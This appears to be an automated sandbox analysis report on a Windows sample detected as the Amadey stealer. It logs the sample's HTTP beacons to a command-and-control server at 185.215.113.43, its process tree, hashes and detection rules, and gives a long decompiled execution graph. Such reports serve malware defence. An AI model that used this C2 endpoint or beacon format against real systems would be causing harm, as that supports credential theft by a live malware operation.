                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.2.849732185.215.113.43802216C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 20, 2024 16:10:07.339086056 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 185.215.113.43
                                                        Content-Length: 156
                                                        Cache-Control: no-cache
                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
                                                        Dec 20, 2024 16:10:08.680332899 CET196INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Fri, 20 Dec 2024 15:10:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 7 <c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        21192.168.2.849733185.215.113.43802216C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 20, 2024 16:10:11.373759985 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 185.215.113.43
                                                        Content-Length: 4
                                                        Cache-Control: no-cache
                                                        Data Raw: 73 74 3d 73
                                                        Data Ascii: st=s
                                                        Dec 20, 2024 16:10:12.717416048 CET219INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Fri, 20 Dec 2024 15:10:12 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Refresh: 0; url = Login.php
                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 1 0


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:10:08:06
                                                        Start date:20/12/2024
                                                        Path:C:\Users\user\Desktop\UyiH4t5dph.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\UyiH4t5dph.exe"
                                                        Imagebase:0x2d0000
                                                        File size:2'990'592 bytes
                                                        MD5 hash:9D38889192A887E1128EC41DD417FB6D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1424348425.0000000005290000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:10:08:09
                                                        Start date:20/12/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                        Imagebase:0xbe0000
                                                        File size:2'990'592 bytes
                                                        MD5 hash:9D38889192A887E1128EC41DD417FB6D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1452607613.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 47%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:6
                                                        Start time:10:09:00
                                                        Start date:20/12/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        Imagebase:0xbe0000
                                                        File size:2'990'592 bytes
                                                        MD5 hash:9D38889192A887E1128EC41DD417FB6D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.1959422053.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:false

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:4.1%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:23.5%
                                                          Total number of Nodes:715
                                                          Total number of Limit Nodes:36
                                                          execution_graph 11225 2d1c20 11226 2d1c31 11225->11226 11229 2ed64e 11226->11229 11232 2ed621 11229->11232 11233 2ed637 11232->11233 11234 2ed630 11232->11234 11241 3098fa 11233->11241 11238 30988e 11234->11238 11237 2d1c3b 11239 3098fa RtlAllocateHeap 11238->11239 11240 3098a0 11239->11240 11240->11237 11244 309630 11241->11244 11243 30992b 11243->11237 11245 30963c __freea 11244->11245 11248 30968b 11245->11248 11247 309657 11247->11243 11249 3096a7 11248->11249 11253 309714 __freea 11248->11253 11252 3096f4 __freea 11249->11252 11249->11253 11254 30edf6 11249->11254 11251 30edf6 RtlAllocateHeap 11251->11253 11252->11251 11252->11253 11253->11247 11255 30ee03 11254->11255 11257 30ee0f __freea ___std_exception_copy 11255->11257 11258 31500f 11255->11258 11257->11252 11259 31501c 11258->11259 11261 315024 __freea 11258->11261 11260 30b04b RtlAllocateHeap 11259->11260 11260->11261 11261->11257 11595 2d4120 11596 2d416a 11595->11596 11598 2d41b2 Concurrency::details::_ContextCallback::_CallInContext std::invalid_argument::invalid_argument 11596->11598 11599 2d3ee0 11596->11599 11600 2d3f48 11599->11600 11601 2d3f1e 11599->11601 11603 2d3f58 11600->11603 11605 2d2c00 11600->11605 11601->11598 11603->11598 11606 2d2c0e 11605->11606 11612 2eb847 11606->11612 11608 2d2c42 11609 2d2c49 11608->11609 11618 2d2c80 11608->11618 11609->11598 11611 2d2c58 std::_Throw_future_error 11613 2eb854 11612->11613 11617 2eb873 Concurrency::details::_Reschedule_chore 11612->11617 11621 2ecb77 11613->11621 11615 2eb864 11615->11617 11623 2eb81e 11615->11623 11617->11608 11629 2eb7fb 11618->11629 11620 2d2cb2 shared_ptr 11620->11611 11622 2ecb92 CreateThreadpoolWork 11621->11622 11622->11615 11624 2eb827 Concurrency::details::_Reschedule_chore 11623->11624 11627 2ecdcc 11624->11627 11626 2eb841 11626->11617 11628 2ecde1 TpPostWork 11627->11628 11628->11626 11630 2eb807 11629->11630 11632 2eb817 11629->11632 11630->11632 11633 2eca78 11630->11633 11632->11620 11634 2eca8d TpReleaseWork 11633->11634 11634->11632 11269 2d1020 11270 2d1031 11269->11270 11271 2ed64e RtlAllocateHeap 11270->11271 11272 2d103b 11271->11272 11068 306629 11071 3064c7 11068->11071 11074 3064d5 11071->11074 11072 306520 11074->11072 11076 30652b 11074->11076 11075 30652a 11082 30a302 GetPEB 11076->11082 11078 306535 11079 30654a 11078->11079 11080 30653a GetPEB 11078->11080 11081 306562 ExitProcess 11079->11081 11080->11079 11083 30a31c 11082->11083 11083->11078 11277 2d8437 11278 2d8439 11277->11278 11279 2d5c10 3 API calls 11278->11279 11280 2d8454 shared_ptr std::invalid_argument::invalid_argument 11279->11280 11652 2d8d30 11653 2d8d80 11652->11653 11654 2d5c10 3 API calls 11653->11654 11655 2d8d9a shared_ptr std::invalid_argument::invalid_argument 11654->11655 11856 2d2e00 11857 2d2e28 11856->11857 11858 2ec68b __Mtx_init_in_situ 2 API calls 11857->11858 11859 2d2e33 11858->11859 11292 2d1000 11293 2ed64e RtlAllocateHeap 11292->11293 11294 2d100a 11293->11294 11872 2d6e14 11873 2d6e16 shared_ptr __freea 11872->11873 11874 308ab6 RtlAllocateHeap 11873->11874 11875 2d6ec1 shared_ptr std::invalid_argument::invalid_argument 11873->11875 11874->11875 12078 2d2b10 12079 2d2b1c 12078->12079 12080 2d2b1a 12078->12080 12081 2ec26a 4 API calls 12079->12081 12082 2d2b22 12081->12082 11892 2d4276 11893 2d2410 4 API calls 11892->11893 11894 2d427f 11893->11894 11698 2d2170 11703 2ec6fc 11698->11703 11701 2ed64e RtlAllocateHeap 11702 2d2184 11701->11702 11704 2ec70c 11703->11704 11705 2d217a 11703->11705 11704->11705 11707 2ecfbe 11704->11707 11705->11701 11708 2eccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 11707->11708 11709 2ecfd0 11708->11709 11709->11704 12104 2d9f44 12105 2d9f4c shared_ptr 12104->12105 12106 2da01f shared_ptr 12105->12106 12107 2da953 Sleep CreateMutexA 12105->12107 12108 2da98e 12107->12108 11336 2d3c47 11337 2d3c51 11336->11337 11339 2d3c5f shared_ptr 11337->11339 11340 2d32d0 11337->11340 11359 2ec6ac 11340->11359 11342 2d336b 11365 2ec26a 11342->11365 11344 2d333c __Mtx_unlock 11346 2ec26a 4 API calls 11344->11346 11350 2d3350 std::invalid_argument::invalid_argument 11344->11350 11347 2d3377 11346->11347 11349 2ec6ac GetSystemTimePreciseAsFileTime 11347->11349 11348 2d3314 11348->11342 11348->11344 11362 2ebd4c 11348->11362 11351 2d33af 11349->11351 11350->11339 11352 2ec26a 4 API calls 11351->11352 11353 2d33b6 __Cnd_broadcast 11351->11353 11352->11353 11354 2ec26a 4 API calls 11353->11354 11355 2d33d7 __Mtx_unlock 11353->11355 11354->11355 11356 2ec26a 4 API calls 11355->11356 11357 2d33eb 11355->11357 11358 2d340e 11356->11358 11357->11339 11358->11339 11372 2ec452 11359->11372 11361 2ec6b9 11361->11348 11389 2ebb72 11362->11389 11364 2ebd5c 11364->11348 11366 2ec274 11365->11366 11367 2ec292 ___std_exception_copy 11365->11367 11366->11367 11368 2ec283 11366->11368 11398 3065ed 11367->11398 11395 2ec297 11368->11395 11373 2ec4a8 11372->11373 11375 2ec47a std::invalid_argument::invalid_argument 11372->11375 11373->11375 11378 2ecf6b 11373->11378 11375->11361 11376 2ec4fd __Xtime_diff_to_millis2 11376->11375 11377 2ecf6b _xtime_get GetSystemTimePreciseAsFileTime 11376->11377 11377->11376 11379 2ecf7a 11378->11379 11380 2ecf87 __aulldvrm 11378->11380 11379->11380 11382 2ecf44 11379->11382 11380->11376 11385 2ecbea 11382->11385 11386 2ecbfb GetSystemTimePreciseAsFileTime 11385->11386 11387 2ecc07 11385->11387 11386->11387 11387->11380 11390 2ebb9c 11389->11390 11391 2ecf6b _xtime_get GetSystemTimePreciseAsFileTime 11390->11391 11394 2ebba4 __Xtime_diff_to_millis2 std::invalid_argument::invalid_argument 11390->11394 11392 2ebbcf __Xtime_diff_to_millis2 11391->11392 11393 2ecf6b _xtime_get GetSystemTimePreciseAsFileTime 11392->11393 11392->11394 11393->11394 11394->11364 11401 2d2ae0 11395->11401 11397 2ec2ae std::_Throw_future_error 11399 3064c7 3 API calls 11398->11399 11400 3065fe 11399->11400 11404 2ebedf 11401->11404 11403 2d2af4 __freea 11403->11397 11407 2ecc31 11404->11407 11408 2ecc3f InitOnceExecuteOnce 11407->11408 11410 2ebef2 11407->11410 11408->11410 11410->11403 11911 306a44 11912 306a52 11911->11912 11913 306a5c 11911->11913 11916 3068ed 11913->11916 11915 306a83 __freea 11919 30683b 11916->11919 11918 306905 11918->11915 11920 306863 11919->11920 11922 306849 __freea 11919->11922 11921 30686a 11920->11921 11924 306889 11920->11924 11921->11922 11926 3069e6 11921->11926 11922->11918 11924->11922 11925 3069e6 RtlAllocateHeap 11924->11925 11925->11922 11927 3069f4 11926->11927 11930 306a25 11927->11930 11931 30b04b RtlAllocateHeap 11930->11931 11932 306a05 11931->11932 11932->11922 11734 2d215a 11735 2ec6fc InitializeCriticalSectionEx 11734->11735 11736 2d2164 11735->11736 11737 2ed64e RtlAllocateHeap 11736->11737 11738 2d216e 11737->11738 12125 2d735a 12127 2d7368 shared_ptr 12125->12127 12126 2d7400 shared_ptr std::invalid_argument::invalid_argument 12127->12126 12134 2d765e shared_ptr 12127->12134 12186 2ed111 12127->12186 12130 2ed64e RtlAllocateHeap 12131 2d7654 12130->12131 12190 2ed0c7 12131->12190 12133 2d777f shared_ptr 12134->12133 12135 2d5c10 3 API calls 12134->12135 12137 2d7883 shared_ptr 12134->12137 12135->12137 12136 2d5c10 3 API calls 12139 2d79e3 12136->12139 12137->12136 12138 2d7953 shared_ptr std::invalid_argument::invalid_argument 12137->12138 12140 2d5c10 3 API calls 12139->12140 12141 2d7a15 shared_ptr 12140->12141 12142 2d7aa5 shared_ptr std::invalid_argument::invalid_argument 12141->12142 12194 2d6d70 12141->12194 12144 2d7b1b shared_ptr 12145 2d5c10 3 API calls 12144->12145 12150 2d7be3 shared_ptr ___std_exception_copy 12144->12150 12146 2d7b7d 12145->12146 12147 2d5c10 3 API calls 12146->12147 12148 2d7ba0 12147->12148 12149 2d5c10 3 API calls 12148->12149 12149->12150 12151 2d5c10 3 API calls 12150->12151 12185 2d7cf4 shared_ptr std::invalid_argument::invalid_argument 12150->12185 12152 2d7dd2 12151->12152 12153 2d5c10 3 API calls 12152->12153 12154 2d7dff 12153->12154 12155 2d7f3f 12154->12155 12156 2d8019 12154->12156 12154->12185 12157 2d5c10 3 API calls 12155->12157 12158 2d5c10 3 API calls 12156->12158 12159 2d7f67 12157->12159 12160 2d804c 12158->12160 12162 2d5c10 3 API calls 12159->12162 12161 2d5c10 3 API calls 12160->12161 12164 2d806b 12161->12164 12163 2d7f86 12162->12163 12165 308bbe RtlAllocateHeap 12163->12165 12166 2d5c10 3 API calls 12164->12166 12165->12185 12167 2d80a3 12166->12167 12168 2d5c10 3 API calls 12167->12168 12169 2d80f4 12168->12169 12170 2d5c10 3 API calls 12169->12170 12171 2d8113 12170->12171 12172 2d5c10 3 API calls 12171->12172 12173 2d814b 12172->12173 12174 2d5c10 3 API calls 12173->12174 12175 2d819c 12174->12175 12176 2d5c10 3 API calls 12175->12176 12177 2d81bb 12176->12177 12178 2d5c10 3 API calls 12177->12178 12179 2d81f3 12178->12179 12180 2d5c10 3 API calls 12179->12180 12181 2d8244 12180->12181 12182 2d5c10 3 API calls 12181->12182 12183 2d8263 12182->12183 12184 2d5c10 3 API calls 12183->12184 12184->12185 12188 2ed122 12186->12188 12187 2d75ed 12187->12130 12187->12134 12188->12187 12198 2ed199 12188->12198 12191 2ed0d6 12190->12191 12192 2ed17f 12191->12192 12193 2ed17b RtlWakeAllConditionVariable 12191->12193 12192->12134 12193->12134 12195 2d6db0 shared_ptr __freea 12194->12195 12196 308ab6 RtlAllocateHeap 12195->12196 12197 2d6ec1 shared_ptr std::invalid_argument::invalid_argument 12195->12197 12196->12197 12197->12144 12199 2ed1a7 SleepConditionVariableCS 12198->12199 12200 2ed1c0 12198->12200 12199->12200 12200->12188 11084 2da856 11085 2da870 11084->11085 11086 2da892 shared_ptr 11084->11086 11085->11086 11088 2da94e 11085->11088 11091 2da8a0 11086->11091 11100 2d7d30 11086->11100 11090 2da953 Sleep CreateMutexA 11088->11090 11089 2da8ae 11089->11091 11092 2d7d30 3 API calls 11089->11092 11094 2da98e 11090->11094 11093 2da8b8 11092->11093 11093->11091 11095 2d7d30 3 API calls 11093->11095 11096 2da8c2 11095->11096 11096->11091 11097 2d7d30 3 API calls 11096->11097 11098 2da8cc 11097->11098 11098->11091 11099 2d7d30 3 API calls 11098->11099 11099->11091 11101 2d7d96 ___std_exception_copy 11100->11101 11136 2d7fb1 shared_ptr std::invalid_argument::invalid_argument 11101->11136 11137 2d5c10 11101->11137 11103 2d7dd2 11104 2d5c10 3 API calls 11103->11104 11105 2d7dff 11104->11105 11106 2d7f3f 11105->11106 11107 2d8019 11105->11107 11105->11136 11108 2d5c10 3 API calls 11106->11108 11109 2d5c10 3 API calls 11107->11109 11110 2d7f67 11108->11110 11111 2d804c 11109->11111 11113 2d5c10 3 API calls 11110->11113 11112 2d5c10 3 API calls 11111->11112 11115 2d806b 11112->11115 11114 2d7f86 11113->11114 11156 308bbe 11114->11156 11117 2d5c10 3 API calls 11115->11117 11118 2d80a3 11117->11118 11119 2d5c10 3 API calls 11118->11119 11120 2d80f4 11119->11120 11121 2d5c10 3 API calls 11120->11121 11122 2d8113 11121->11122 11123 2d5c10 3 API calls 11122->11123 11124 2d814b 11123->11124 11125 2d5c10 3 API calls 11124->11125 11126 2d819c 11125->11126 11127 2d5c10 3 API calls 11126->11127 11128 2d81bb 11127->11128 11129 2d5c10 3 API calls 11128->11129 11130 2d81f3 11129->11130 11131 2d5c10 3 API calls 11130->11131 11132 2d8244 11131->11132 11133 2d5c10 3 API calls 11132->11133 11134 2d8263 11133->11134 11135 2d5c10 3 API calls 11134->11135 11135->11136 11136->11089 11138 2d5c54 11137->11138 11159 2d4b30 11138->11159 11140 2d5c7b ___std_exception_copy 11141 2d5d17 shared_ptr std::invalid_argument::invalid_argument 11140->11141 11142 2d5da7 RegOpenKeyExA 11140->11142 11141->11103 11143 2d5e00 RegCloseKey 11142->11143 11145 2d5e26 11143->11145 11144 2d5ea6 shared_ptr std::invalid_argument::invalid_argument 11144->11103 11145->11144 11146 2d5c10 RtlAllocateHeap 11145->11146 11147 2d66ac 11146->11147 11148 2d5c10 RtlAllocateHeap 11147->11148 11149 2d66b1 shared_ptr 11148->11149 11150 2d5c10 RtlAllocateHeap 11149->11150 11153 2d6852 shared_ptr __freea 11149->11153 11152 2d673d shared_ptr 11150->11152 11151 2d5c10 RtlAllocateHeap 11151->11152 11152->11151 11152->11153 11155 2d690f shared_ptr std::invalid_argument::invalid_argument 11153->11155 11163 308ab6 11153->11163 11155->11103 11157 308868 RtlAllocateHeap 11156->11157 11158 308bdc 11157->11158 11158->11136 11161 2d4ce5 11159->11161 11162 2d4b92 11159->11162 11161->11140 11162->11161 11167 306da6 11162->11167 11164 308ad1 11163->11164 11192 308868 11164->11192 11166 308adb 11166->11155 11168 306dc2 11167->11168 11169 306db4 11167->11169 11168->11162 11172 306d19 11169->11172 11173 306d2c 11172->11173 11176 306d52 11173->11176 11175 306d3d 11175->11162 11177 306d5f 11176->11177 11178 306d6e 11176->11178 11177->11178 11180 30b6a1 11177->11180 11178->11175 11181 30b6be 11180->11181 11183 30b6ce std::invalid_argument::invalid_argument 11181->11183 11184 30f1bf 11181->11184 11183->11178 11185 30f1df 11184->11185 11187 30f232 __freea ___std_exception_copy std::invalid_argument::invalid_argument 11185->11187 11188 30b04b 11185->11188 11187->11183 11190 30b087 __freea 11188->11190 11191 30b059 __freea 11188->11191 11189 30b074 RtlAllocateHeap 11189->11190 11189->11191 11190->11187 11191->11189 11191->11190 11194 30887a 11192->11194 11193 306d52 RtlAllocateHeap 11193->11194 11194->11193 11195 30888f __freea ___std_exception_copy 11194->11195 11195->11166 11196 30b04b 11198 30b087 __freea 11196->11198 11199 30b059 __freea 11196->11199 11197 30b074 RtlAllocateHeap 11197->11198 11197->11199 11199->11197 11199->11198 12206 2d9ba5 12207 2d9ba7 12206->12207 12208 2d5c10 3 API calls 12207->12208 12209 2d9cb1 12208->12209 12210 2d8b30 3 API calls 12209->12210 12211 2d9cc2 12210->12211 11200 2db1a0 11201 2db1f2 11200->11201 11202 2db3ad CoInitialize 11201->11202 11203 2db3fa shared_ptr std::invalid_argument::invalid_argument 11202->11203 11438 2d20a0 11443 2ec68b 11438->11443 11441 2ed64e RtlAllocateHeap 11442 2d20b6 11441->11442 11446 2ec3d5 11443->11446 11445 2d20ac 11445->11441 11447 2ec3eb 11446->11447 11448 2ec3e1 11446->11448 11447->11445 11449 2ec3be 11448->11449 11450 2ec39e 11448->11450 11459 2ecd0a 11449->11459 11450->11447 11455 2eccd5 11450->11455 11452 2ec3d0 11452->11445 11456 2ec3b7 11455->11456 11457 2ecce3 InitializeCriticalSectionEx 11455->11457 11456->11445 11457->11456 11460 2ecd1f RtlInitializeConditionVariable 11459->11460 11460->11452 11473 2d70a0 11475 2d70d2 ___std_exception_copy 11473->11475 11474 2d7243 std::invalid_argument::invalid_argument 11475->11474 11477 2d6ef0 11475->11477 11478 2d6f22 __freea 11477->11478 11479 308ab6 RtlAllocateHeap 11478->11479 11480 2d6fd6 shared_ptr std::invalid_argument::invalid_argument 11478->11480 11479->11480 11480->11475 11949 2d9ab8 11951 2d9acc 11949->11951 11952 2d9b08 11951->11952 11953 2d5c10 3 API calls 11952->11953 11954 2d9b7c 11953->11954 11961 2d8b30 11954->11961 11956 2d9b8d 11957 2d5c10 3 API calls 11956->11957 11958 2d9cb1 11957->11958 11959 2d8b30 3 API calls 11958->11959 11960 2d9cc2 11959->11960 11962 2d8b7c 11961->11962 11963 2d5c10 3 API calls 11962->11963 11964 2d8b97 shared_ptr std::invalid_argument::invalid_argument 11963->11964 11964->11956 11965 2d42b0 11968 2d3ac0 11965->11968 11967 2d42bb shared_ptr 11969 2d3af9 11968->11969 11970 2d32d0 5 API calls 11969->11970 11972 2d3c38 11969->11972 11973 2d3b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 11969->11973 11970->11972 11971 2d32d0 5 API calls 11974 2d3c5f shared_ptr 11971->11974 11972->11971 11972->11974 11973->11967 11974->11967 12228 2d77b0 12229 2d77f1 shared_ptr 12228->12229 12230 2d5c10 3 API calls 12229->12230 12231 2d7883 shared_ptr 12229->12231 12230->12231 12232 2d5c10 3 API calls 12231->12232 12233 2d7953 shared_ptr std::invalid_argument::invalid_argument 12231->12233 12234 2d79e3 12232->12234 12235 2d5c10 3 API calls 12234->12235 12237 2d7a15 shared_ptr 12235->12237 12236 2d7aa5 shared_ptr std::invalid_argument::invalid_argument 12237->12236 12238 2d6d70 RtlAllocateHeap 12237->12238 12239 2d7b1b shared_ptr 12238->12239 12240 2d5c10 3 API calls 12239->12240 12245 2d7be3 shared_ptr ___std_exception_copy 12239->12245 12241 2d7b7d 12240->12241 12242 2d5c10 3 API calls 12241->12242 12243 2d7ba0 12242->12243 12244 2d5c10 3 API calls 12243->12244 12244->12245 12246 2d5c10 3 API calls 12245->12246 12280 2d7cf4 shared_ptr std::invalid_argument::invalid_argument 12245->12280 12247 2d7dd2 12246->12247 12248 2d5c10 3 API calls 12247->12248 12249 2d7dff 12248->12249 12250 2d7f3f 12249->12250 12251 2d8019 12249->12251 12249->12280 12252 2d5c10 3 API calls 12250->12252 12253 2d5c10 3 API calls 12251->12253 12254 2d7f67 12252->12254 12255 2d804c 12253->12255 12257 2d5c10 3 API calls 12254->12257 12256 2d5c10 3 API calls 12255->12256 12259 2d806b 12256->12259 12258 2d7f86 12257->12258 12260 308bbe RtlAllocateHeap 12258->12260 12261 2d5c10 3 API calls 12259->12261 12260->12280 12262 2d80a3 12261->12262 12263 2d5c10 3 API calls 12262->12263 12264 2d80f4 12263->12264 12265 2d5c10 3 API calls 12264->12265 12266 2d8113 12265->12266 12267 2d5c10 3 API calls 12266->12267 12268 2d814b 12267->12268 12269 2d5c10 3 API calls 12268->12269 12270 2d819c 12269->12270 12271 2d5c10 3 API calls 12270->12271 12272 2d81bb 12271->12272 12273 2d5c10 3 API calls 12272->12273 12274 2d81f3 12273->12274 12275 2d5c10 3 API calls 12274->12275 12276 2d8244 12275->12276 12277 2d5c10 3 API calls 12276->12277 12278 2d8263 12277->12278 12279 2d5c10 3 API calls 12278->12279 12279->12280 12281 2d87b0 12282 2d87b8 GetFileAttributesA 12281->12282 12283 2d87b6 12281->12283 12284 2d87c4 12282->12284 12283->12282 12285 2e47b0 12287 2e4eed 12285->12287 12286 2e4f59 shared_ptr std::invalid_argument::invalid_argument 12287->12286 12326 2d6950 12287->12326 12289 2e5025 12290 2d7d30 3 API calls 12289->12290 12291 2e50ed 12290->12291 12330 2d8380 12291->12330 12293 2e5106 12294 2d5c10 3 API calls 12293->12294 12295 2e5155 12294->12295 12296 2d5c10 3 API calls 12295->12296 12297 2e5171 12296->12297 12336 2d9a00 12297->12336 12328 2d69c8 shared_ptr __freea 12326->12328 12327 2d6d39 shared_ptr std::invalid_argument::invalid_argument 12327->12289 12328->12327 12329 308ab6 RtlAllocateHeap 12328->12329 12329->12327 12331 2d83e5 ___std_exception_copy 12330->12331 12332 2d5c10 3 API calls 12331->12332 12335 2d8403 shared_ptr std::invalid_argument::invalid_argument 12331->12335 12333 2d8427 12332->12333 12334 2d5c10 3 API calls 12333->12334 12334->12335 12335->12293 12337 2d9a3f 12336->12337 12338 2d5c10 3 API calls 12337->12338 12339 2d9a47 12338->12339 12340 2d8b30 3 API calls 12339->12340 12341 2d9a58 12340->12341 11221 2d87b2 11222 2d87b8 GetFileAttributesA 11221->11222 11223 2d87b6 11221->11223 11224 2d87c4 11222->11224 11223->11222 11481 2d3c8e 11482 2d3c98 11481->11482 11484 2d3ca5 shared_ptr 11482->11484 11485 2d2410 11482->11485 11486 2d2424 11485->11486 11489 2eb52d 11486->11489 11497 303aed 11489->11497 11492 2eb5a5 ___std_exception_copy 11504 2eb1ad 11492->11504 11493 2eb598 11500 2eaf56 11493->11500 11496 2d242a 11496->11484 11508 304f29 11497->11508 11499 2eb555 11499->11492 11499->11493 11499->11496 11501 2eaf9f ___std_exception_copy 11500->11501 11503 2eafb2 shared_ptr 11501->11503 11512 2eb39f 11501->11512 11503->11496 11505 2eb1d8 11504->11505 11506 2eb1e1 shared_ptr 11504->11506 11507 2eb39f InitOnceExecuteOnce 11505->11507 11506->11496 11507->11506 11509 304f2e ___std_exception_copy 11508->11509 11509->11499 11510 3065ed 3 API calls 11509->11510 11511 308c2f 11510->11511 11513 2ebedf InitOnceExecuteOnce 11512->11513 11515 2eb3e1 11513->11515 11514 2eb3e8 11514->11503 11515->11514 11516 2ebedf InitOnceExecuteOnce 11515->11516 11517 2eb461 11516->11517 11517->11503 11767 2d8980 11769 2d89d8 shared_ptr 11767->11769 11770 2d8aea 11767->11770 11768 2d5c10 3 API calls 11768->11769 11769->11768 11769->11770 11204 2d5c83 11206 2d5c91 shared_ptr ___std_exception_copy 11204->11206 11205 2d5d17 shared_ptr std::invalid_argument::invalid_argument 11206->11205 11207 2d5da7 RegOpenKeyExA 11206->11207 11208 2d5e00 RegCloseKey 11207->11208 11210 2d5e26 11208->11210 11209 2d5ea6 shared_ptr std::invalid_argument::invalid_argument 11210->11209 11211 2d5c10 3 API calls 11210->11211 11212 2d66ac 11211->11212 11213 2d5c10 3 API calls 11212->11213 11214 2d66b1 shared_ptr 11213->11214 11215 2d5c10 3 API calls 11214->11215 11218 2d6852 shared_ptr __freea 11214->11218 11216 2d673d shared_ptr 11215->11216 11217 2d5c10 3 API calls 11216->11217 11216->11218 11217->11216 11219 308ab6 RtlAllocateHeap 11218->11219 11220 2d690f shared_ptr std::invalid_argument::invalid_argument 11218->11220 11219->11220 12358 2d3f9f 12359 2d3fad 12358->12359 12360 2d3fb6 12358->12360 12361 2d2410 4 API calls 12359->12361 12361->12360 12362 2d2b90 12363 2d2bce 12362->12363 12364 2eb7fb TpReleaseWork 12363->12364 12365 2d2bdb shared_ptr std::invalid_argument::invalid_argument 12364->12365 12382 2d3fe0 12383 2d4022 12382->12383 12384 2d408c 12383->12384 12385 2d40d2 12383->12385 12388 2d4035 std::invalid_argument::invalid_argument 12383->12388 12389 2d35e0 12384->12389 12386 2d3ee0 3 API calls 12385->12386 12386->12388 12390 2d3616 12389->12390 12394 2d364e Concurrency::cancel_current_task shared_ptr std::invalid_argument::invalid_argument 12390->12394 12395 2d2ce0 12390->12395 12392 2d369e 12393 2d2c00 3 API calls 12392->12393 12392->12394 12393->12394 12394->12388 12396 2d2d1d 12395->12396 12397 2ebedf InitOnceExecuteOnce 12396->12397 12398 2d2d46 12397->12398 12400 2d2d51 std::invalid_argument::invalid_argument 12398->12400 12401 2ebef7 12398->12401 12400->12392 12402 2ebf03 std::_Throw_future_error 12401->12402 12403 2ebf6a 12402->12403 12404 2ebf73 12402->12404 12408 2ebe7f 12403->12408 12405 2d2ae0 InitOnceExecuteOnce 12404->12405 12407 2ebf6f 12405->12407 12407->12400 12409 2ecc31 InitOnceExecuteOnce 12408->12409 12410 2ebe97 12409->12410 12410->12407 11799 2da9f4 11810 2d9230 11799->11810 11801 2daa03 shared_ptr 11802 2d5c10 3 API calls 11801->11802 11808 